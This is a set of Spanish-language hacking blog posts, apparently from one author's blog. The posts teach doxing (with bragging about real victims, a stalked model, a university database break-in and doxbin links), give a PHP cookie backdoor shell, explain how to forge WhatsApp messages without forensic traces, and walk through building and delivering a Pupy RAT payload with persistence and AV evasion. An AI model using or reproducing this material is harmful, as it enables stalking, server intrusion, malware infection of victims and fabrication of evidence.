Aprendiendo el arte del Doxing intermedio

Saludos mis queridos fieles lectores en  esta oportunidad enseñare algunos métodos de doxing la cual nos puede servir de utilidad para investigar a una persona detrás de una identidad falsa o seu-identidad,para obtener todos los datos reales de nuestra victima como:

1. Nombres y apellidos
2. Dni
3. Edad
4. Sexo
5. Centros de educación
6. Identificación de correo electrónico
7. Dirección de ubigeo
8. Número de teléfono
9. Amigos en común
10. Familiares

¿Que es el doxing o doxeo?

En esta oportunidad quisiera darle paso a el concepto de un amigo mio con el seudónimo : 

Hiro Maxwell , el cual me enseño hace poco como se elaboraba un escenario de doxeo y me gustaría agradecerle en este humilde POST su enseñanza que me brindo, ya que hasta el día de hoy me ha servido para mis investigaciones sobre personas fraudulentas.Doxing es obtener la mayor cantidad de datos posibles acerca de una persona/objetivo a partir de UNO,POCOS o MUCHOS datos (osea, a partir de cualquier cosa).

De acuerdo a ello podemos definir que el doxing es un ataque dirigido a datos mínimos de un objetivo la cual se pasara en una serie de investigaciones obteniendo datos grandes de datos pequeños.

Hoy en día existen muchas aplicaciones web, que nos pueden ayudar a facilitar la búsqueda de personas que nos puede ser de gran utilidad para nuestras investigaciones, no obstante podemos aprovechar  "Google", ya que gracias a este buscador tenemos millones de palabras indexeadas que nos pueden facilitar mas aun nuestro trabajo, de igual manera google ah añadido una búsqueda de imágenes que puede ser el santo brial para los Doxing.

En esta prueba de concepto  no haré la búsqueda con un alias  o personas por seguridad, me enfocare en algo mas liviano como alguien con el seudónimo "RootByte", la cual me autorizo su nombre en esta prueba,haré como si no lo conociera y solo me enfocare en buscar el seudónimo mencionado. bueno vayamos a la acción.

Escenario de investigación

 Como bien dije hace momentos google puede ser una arma secreta muy creativa si se sabe utilizar los parámetros de búsqueda correctos, lo que haremos sera ver si el tal RootByte tiene una cuenta de facebook o fan page relacionada,

RootByte site:facebook.com 

en solo añadir una pequeña búsqueda de nuestro objetivo enfocada en la red social Facebook, podemos observar mas de 3,260 resultados que nos pueden facilitar nuestra investigación en esa red interna, si el objetivo tuviera el nick en su perfil ya sabríamos quien es, pero como sabemos que nuestro objetivo es una persona con algo de popularidad en el ambiente lo que haremos sera utilizar una búsqueda en Plus Google, que es el servidor de cuentas de Gmail enlazadas a canales de Youtube y blogs.

RootByte site:plus.google.com

como vemos observar hay un diminutivo adjunto a RootByte & Johnny, lo que hare sera entrar a la cuenta y ver que información puedo obtener mas aya de un nombre que puede ser real.

Por 

Como vemos el objetivo tiene  un solo video, pero sean observadores algunas personas por descuido dejan mas datos de lo que pueden ser aprovechados como por ejemplo, arriba nos aparece un logotipo de Facebook,Google y un enlazado a un sitio web.

oh :( , ya no existen esas cuentas o quizás fueron removidas u editadas, ya que esos datos datan de hace mas de 2 años, que en su tiempo pudo ser jugosa, entonces seguiremos con nuestra investigación hasta encontrar el nombre del objetivo, como sabemos Johnny es un diminutivo de Jhonathan, entonces enfoquemosnos en  buscar el nombre Jhonathan adjuntado con RootByte en google.

podemos observar que hay mas de 1600 resultados de esas palabras adjuntas con el nombre del seudonimo RootByte llamado Jhonathan Paz

Algunas web asociadas del objetivo:

https://www.facebook.com/Jonathan.RootByte

http://rootbyte.blogspot.pe

https://www.xssposed.org/researchers/RootByte/

http://www.levelup.com/usuario/RootByte

http://square-pics.com/rootbyte

https://twitter.com/rootbytemx

http://www.tomatazos.com/usuario/RootByte

https://hackerslist.com/user/RootByte

https://www.blogger.com/profile/04503563111051656326

Existen servidor web que nos felicitaran nuestra búsqueda en redes sociales donde mayormente las personas tienen un error de publicar mas de lo que se debe.

Skypepese: http://www.skipease.com

Para mi esta web es una de mas completas en redes sociales ya que podemos obtener una búsqueda manual del objetivo, ya que al buscar un red social nos arrojara el dork de búsqueda que la mayoría de estos servicios tiene como estructura,en la cual podemos intelectuar de manera muy sencilla.

Pipl https://pipl.com/

de igual manera este servicio sin duda seria de gran ayuda ya que nos lanzaría resultados aleatorios de las web de red social mas utilizadas con gráficos que nos serian de ayuda.

Otros servicios donde pueden realizar una buena búsqueda son las siguientes:  

http://buscardatos.com/Personas/ >>> consta con varias búsquedas de países donde nos resultara de maravilla.

Entre mucha mas información que obtuve de mi objetivo utilizando búsquedas mas avanzadas ya que obtenido datos de familiares, novia, ubicación de real, entre otras las cuales no puedo mostrar por respeto al acuerdo que se hizo con RootByte.

Supongamos que no hemos realizado nada de la investigación y solo tenemos una foto del objetivo:

como bien sabemos google ha implementando una búsqueda nueva que es por Imagen, lo que haremos sera subir esta foto a nube del buscador y esperar los datos que nos arroje.

https://www.google.com.pe/imghp

si nuestro objetivo que deseamos buscar tiene la foto en una referencia de una cuenta de red social o simplemente añadido en un contacto de su entorno, daríamos con el bingo !, en nuestro caso ya sabemos quien es esta persona y empezaríamos a recopilar mas información de la que sabemos o también podemos utilizar una herramienta de recopilación mas grande de informathion gathering

llamado "Maltego"

https://www.paterva.com/web6/

En mi caso hace poco hice un doxing a una persona "X",pero primero me enfoque a un objetivo familiar que me ayudo a encontrarlo , esta es una FOTO de un Doxing real hecho por mi persona.

este objetivo fue una persona "Familiar" , que me brindo ubicar a mi objetivo central, en mi caso utilice algunas técnicas de google,buscadores de redes sociales y maltego para rematar al objetivo mediante un análisis estructurado.

de acuerdo con la investigación de las personas familiarizadas al objetivo que esta oculto por su seguridad, pude obtener todos los datos de esa persona, como DNI,ubicación,familiares,casa,teléfonos,entre muchas cosas privadas de el, y para darle el tiro de gracia a mi objetivo entre a la BASE DE DATOS de su universidad para encontrar los datos y me confirmaron que si era el objetivo correcto :)

Vulnerabilidad nueva en la plataforma reciente de dicha universidad :

http://www.uap.edu.pe/Libreria/FrmLibros.aspx?catId='ca008

hace poco hice un post sobre como un dump y una red social nos puede ayudar de mucho para encontrar y obtener datos de personas :

http://backtrack-omar.blogspot.pe/2014/10/que-es-la-ingenieria-social.html

pero como lo dije no mostrare datos de las personas, porque no quiero perjudicar a nadie con este POST, porque si lo hubiera hecho ya los hubiera subido a las web conocidas de datos de Doxing:

https://doxbin5mpp3eh2tz.onion.to

https://tt3j2x4k5ycaa5zt.onion.to/upload.php

Pero en mi caso, no puedo hacerlo ya que un estimo a este colega mio y no quiero perjudicarlo en nada, ya que tengo una amistad de años con este tipo, pero lo mejor seria alejarme un poco tiempo para que se calmen las aguas y volver a retomar la amistad dejando en claro algunos puntos.

por otro lado Hiro Maxwell quien  me brindo algunos métodos me dio la autorizo una foto  de su doxing que le hizo a una modelo ucraniana bien buenota xD

como vemos obtuvo toda la información de la modelo como su DNI y cédula, mas que suficiente para el, porque desde ese día consigo ligar con la modelo xD

Espero les aya gustado este POST, deseo aclarar que el doxing es un rama de investigación de como uno puede pensar e investigar del modo que sea del agrado del usuario, SALUDOS

Backcookie la herramienta de conexión remota

Saludos mis fieles lectores, en esta oportunidad vamos a modernizarnos para dejar atrás las webshells, que en su mayoría ya están quemadas por algunos antivirus y firewalls que puede tener un servidor web,dando  entrada a Backcookie  una herramienta escrita en python la cual tiene como función tener conexiones entrantes de servidores web mediante cookies, vayamos a la acción

Good By Backdoors detectable.

¿Que es una Cookie?  

Las cookies son un mecanismo por el que se almacenan datos en el navegador remoto para monitorizar o identificar a los usuarios que vuelvan al sito web.

referencia: http://php.net/manual/es/features.cookies.php


Lo que haremos sera descargar la herramienta Backcokkie, luego de ello pasaremos a extraerlo

root@kali:~# wget https://github.com/jofpin/backcookie/archive/master.zip 

Antes de comenzar deseo mandar un saludo  para un buen hermano mio, "Fraph Core" que el día de hoy esta cumpliendo un año mas de vida, por este motivo realizo este post, ya que la herramienta es creada por el y es la forma mas oportuna de hacerlo.
Feliz cumpleaños hermano!!

Iniciando la herramienta

Antes que nada podemos observar como funciona la herramienta, de acuerdo al autor funciona de dos maneras :

• Example one: python backcookie.py -u http://target.com/shell.php -c name_cookie
• Example two: python backcookie.py --url http://target.com/shell.php --cookie name_cookie

Métodos de subir el código de conexión  

Source:

<?php error_reporting(0); system(base64_decode($_COOKIE["yourcookie"])); ?>

El primer método en un servidor VPS 

sera crear un archivo .php añadiendo el codigo y subirlo al servidor web.

El segundo método 

seria añadir el código en archivo del servidor web, mediante una webshell.

Estos métodos serian los que podan utilizar ustedes,mas abajo les tengo una sorpresa cual método yo  me ingenie para hacerlo aun mas confidencial.

entonces una ves añadido nuestro código, pasaremos ejecutarlo:

Como podemos observar el dominio comprometido es un servidor privado (VPS), la cual tenemos acceso al sistema del servidor, la cual podemos subir nuestros payload de meterpreter,archivos RAT,o los que ustedes deseen, en mi caso les enseñare a utilizar esta herramienta de manera estándar, en este servidor VPS en Windows como prueba de concepto.

Lo que haremos sera ejecutar el comando CMD

como vemos hemos tenido acceso a la interprete de comandos de windows, lo que podemos hacer ahora es ejecutar los comandos que utilizamos siempre, en mi caso haré un mapeo de todas las IP'S conectadas al servidor, en este caso todos los demás servicios privados.

como podemos observar nos arroja las IP'S conectadas la cual podemos aprovecharlas para auditarlas y explotarlas mediante metasploit, o subir un archivo RAT y capturar todos los datos del servidor, por mi parte no lo haré, por motivos de ética, de igual manera podemos ver el tipo de servicio del router como veremos aquí:

Paremos a entrar a otro servidor web, en este caso el siguiente:

Como vemos es un servidor en Linux la cual, podemos interactuar con ella, sin mas que decir doy como culminado este POST, espero les aya gustado demasiado la herramienta Backcookie, ya que llevo casi un año utilizando esta gran herramienta y lo hago publico porque eh visto que hay "Personas" que han modificado el nombre del autor y han estado ripiandola :/




Creado Por Omar Rodriguez

WhatsApp: modifica la base de datos sin dejar huellas

Gabriela Liquet 13:18 WhatsApp 

 

WhatsApp es sin duda la aplicación de mensajería instantánea más utilizada en todo el mundo. Cada vez las conversaciones que se envían a través de este cliente de mensajería tienen un mayor valor, tanto personal para los usuarios como para piratas informáticos e incluso como pruebas en asuntos legales. Para proteger la seguridad e integridad de estas conversaciones, el equipo de WhatsApp ha aplicado varias medidas de seguridad tanto a las comunicaciones como a los historiales de chat que se guardan en el teléfono, aunque según parece estas medidas no son del todo eficaces. 

Peritos informáticos han conseguido identificar y explotar el fallo de seguridad de WhatsApp, concretamente en la versión 2.12.250 ejecutada sobre dos sistemas Android 5.x y 4.4.x, que permite modificar la base de datos de WhatsApp para editar mensajes sin dejar rastro de la modificación.

WhatsApp utiliza para las conversaciones el software de bases de datos SQLite. WhatsApp en total utiliza dos bases de datos diferentes, la original, que se encuentra sin cifrar, y la copia de seguridad, la cual utiliza sistemas de criptografía simétrica junto al algoritmo AES de clave única para el cifrado y el descifrado de la misma. Mientras que la copia de datos está “protegida” y no nos interesa de momento, vamos a centrarnos en la base de datos original, la que utiliza el propio cliente de mensajería en tiempo real. 

La base de datos que utiliza WhatsApp para mostrar las conversaciones en tiempo real en el propio cliente de mensajería se guarda en plano, sin cifrar como hemos dicho, aunque sí que se encuentra en un directorio de acceso limitado. 

Descargar la base de datos de conversaciones de WhatsApp al PC

Para poder modificar una conversación de WhatsApp lo primero que debemos hacer es tener permisos de root sobre el dispositivo. Una vez con estos permisos habilitados conectamos el smartphone a nuestro ordenador y, a través de la herramienta de desarrollo adb ejecutamos los siguientes comandos:

• adb devices (nos muestra los dispositivos conectados, útil para saber si todo funciona correctamente)
• adb shell (nos abre un terminal para controlar el smartphone)

A continuación ejecutamos el comando “su” para conseguir permisos de superusuario en el dispositivo.

• su

Con estos garantizados nos situamos sobre la ruta de las bases de datos de WhatsApp tecleando en el terminal o shell:

• cd /data/data/com.whatsapp/databases

A continuación ejecutamos el comando ls -la para mostrar una lista con todos los archivos de dicho directorio. Si nos fijamos en esta lista, uno de los archivos se llamará msgstore.db. Este archivo contiene toda la base de datos de conversaciones de WhatsApp que se guardan automáticamente (y sin cifrar) cada vez que recibimos o enviamos un mensaje.

Una vez confirmado que tenemos el archivo de la base de datos en nuestro smartphone debemos copiarlo al ordenador. Para ello escribimos dos veces “exit” en el terminal para salir del shell y volver a Windows y desde allí tecleamos:

• adb pull /data/data/com.whatsapp/databases/msgstore.db

El archivo se descarga a nuestro PC, a la misma ruta donde tenemos el binario de adb copiado. Todo listo. Ya podemos empezar a modificar los mensajes que queramos.

Modificar la base de datos de conversaciones

Una vez tenemos la base de datos en nuestro PC debemos descargarnos la aplicación SQLiteStudio con la que la abriremos y modificaremos. Una vez tengamos el programa lo ejecutamos y cargamos la base de datos desde el menú Database -> Add a database y nos conectamos a ella mediante el menú Database -> Connect to the database.

Una vez conectados a la base de datos veremos todas las tablas de la misma, aunque debemos centrarnos en dos:

• messages
• messages_fts_content

Lo primero que debemos hacer es identificar la clave privada del mensaje. Para ello lanzamos una consulta a la base de datos con el siguiente comando:

• select * from messages where data LIKE “%mensaje%”; (sustituyendo mensaje por el contenido que queremos buscar)

Apuntamos en un papel o documento la clave privada del mensaje, o valor de la columna ID, para igualar los cambios en las dos tablas anteriores. A continuación, en la columna “data” de la table “messages” cambiamos el valor del mensaje que hemos enviado por el nuevo que queremos establecer. 

Una vez realizados los cambios que queremos pulsamos sobre el botón “commit” para que estos se apliquen y cambien en la base de datos.

La mitad del proceso ya está hecho. Ahora abrimos la tabla messages_fts_content y en el buscador introducimos la clave privada, o ID, que hemos anotado antes. Veremos una nueva fila con el contenido del mensaje, que aún no ha sido cambiado como el de la primera tabla.

Lo seleccionamos y modificamos de igual forma, pero manteniendo el estilo original de la tabla:

• Todo el texto en minúsculas.
• Las palabras separadas por tres espacios.
• Los signos de puntuación separados de la palabra anterior por un espacio.

Aunque este paso no es obligatorio es recomendable para dificultar aún más el poder saber que la tabla ha sido modificada. Ya tenemos todo listo. Ahora sólo nos queda volver a copiar la tabla a nuestro móvil.

Copiar al teléfono la base de datos modificada de conversaciones de WhatsApp

Una vez que hemos realizado los cambios anteriores en la base de datos es hora de subirla de nuevo al smartphone. Para ello abrimos de nuevo una ventana de MS-DOS y tecleamos:

• adb push msgstore.db /data/data/com.whatsapp/databases/msgstore.db

La base de datos se ha subido correctamente a nuestro dispositivo, aunque hay un pequeño problema: los permisos. 

Al haber subido una base de datos como usuario adb con permisos de superusuario, el propietario y el grupo de este archivo ahora es “root”. Si queremos borrar todo rastro de haber modificado dicha conversación tenemos que teclear en nuestro terminal:

• adb shell
• su
• cd /data/data/com.whatsapp/databases
• ls –la
• chown u0_a88:u0_a88 msgstore.db

Todo listo. Ya podemos abrir nuestro WhatsApp de nuevo y ver cómo los mensajes que hemos enviado y recibido son diferentes. A simple vista es totalmente imposible saber si un mensaje es original o ha sido modificado y siguiendo un análisis forense tampoco es posible saberlo ya que los cambios no han dejado rastro ni en la base de datos ni en nuestro smartphone. 

Según la finalidad que vayamos a dar a esto debemos tener en cuenta que es posible que estemos cometiendo un delito (por ejemplo para presentarlo como pruebas legales) y que siempre hay formas de detectar el engaño (por ejemplo mediante el análisis físico de los chips de memoria, quienes podrían demostrar que hay otro archivo “mstorage.db” que ha sido eliminado previamente. 

Fuente: redeszone.net

Pupy - Remote Administration Tool

Saludos mis queridos lectores en esta oportunidad vengo a presentar una nueva herramienta salida del horno,llamada Pupy la cual tiene como función infectar ordenadores al estilo de msfconsole pero con un estilo mas complejo, Pupy utiliza inyección dll reflexiva y no deja rastros en el disco.

Módulos implementadas:

• migrar (Windows)
• entre la inyección arquitectura de procesos también trabaja (x86> x64 y x64-> x86)
• keylogger (Windows)
• persistencia (Windows)
• captura de pantalla (Windows)
• instantánea cámara web (Windows)
• ejecución de comandos
• descargar
• subir
• Proxy socks5
• reenvío de puerto local
• shell interactiva (cmd.exe, / bin / sh, ...)
• shell python interactiva
• exec shellcode (gracias a @ byt3bl33d3r)

Descarga:

https://github.com/n1nj4sec/pupy/

Antes de instalar Pupy debemos instalar  el complemento rpyc para poder ejecutar el servidor de nuestro pupy y arranque correctamente, entonces pasaremos a descargarlo e instalarlo.

root@kali:~/rpyc-master# pip install rpyc

Como vemos ha sido instalado correctamente los repertorios correctamente, entonces lo que haremos sera descargar el pupy y luego lo extraeremos 

root@kali:~# wget https://github.com/n1nj4sec/pupy/archive/master.zip

root@kali:~# unzip master.zip

luego de ello, entraremos a la carpeta y ejecutaremos el archivo : pupygen.py

root@kali:~/pupy-master/pupy# python pupygen.py -h

como vemos nos arroja las opciones donde podemos crear nuestro payload, hay diferentes arquitecturas para compatibilidad de los ejecutables,la opción de conexión de nuestra IP y el puerto de escucha, entonces vamos 

python pupygen.py -t exe_x86 -o jaja.exe -p 443 192.168.179.129

el nombre del archivo malioso es jaja.exe ,xD no es nada complicado solo ejecutamos el tipo de arquitectura que deseamos compilar el ejecutable y nuestra ip y el puerto, luego de ello configuramos el archivo de arranque del servidor de pupy server por nano en la terminal.

nano pupy.conf 

el la primera linea añadir la IP de ustedes donde añadieron anteriormente en el payload de pupy, igualmente el mismo puerto.

como vemos ya tenemos cargando nuestro servidor para recibir las conexiones entrantes de nuestras victimas, ahora solo mandaríamos el archivo nuestra victima.

Una ves que nuestra victima ejecute el archivo, automáticamente tenemos su sesión meterpreter corriendo como vemos en la siguiente imagen.

para poder ver los comandos añaden help como en la imagen anterior.

para ver nuestros clientes que están infectados y la info de los sistemas, en mi caso como es solo un objetivo nos arroja solamente 2 de uno.

para poder ejecutar nuestra opciones de los módulos que podemos interactuar con nuestro sistema comprometido con el comando : list_modules

lo que haremos sera crear nuestro backdoor persistente y que se ejecute cada ves que se apage el equipo de la victima, utilizaremos run persistence -m registry , en la consola del meterpreter.

para ejecutar cualquier proceso debemos añadir primero run y luego el comando de ejecución como vemos en la imagen, ahora ejecutare el siguiente comando, para conectarme a la terminal de cmd de windows.

Si deseas ponerlo indetectable  el ejecutable, puedes hacerlo con shellter ya que hace la misma función de un meterpreter para pupy.

link del articulo :

http://backtrack-omar.blogspot.com/2015/10/evadiendo-av-codificando-payloads-con.html


Ante mano les deseo un saludo a todos mis fieles lectores de mi humilde blog!
Happy Hacking CyberPunks!!!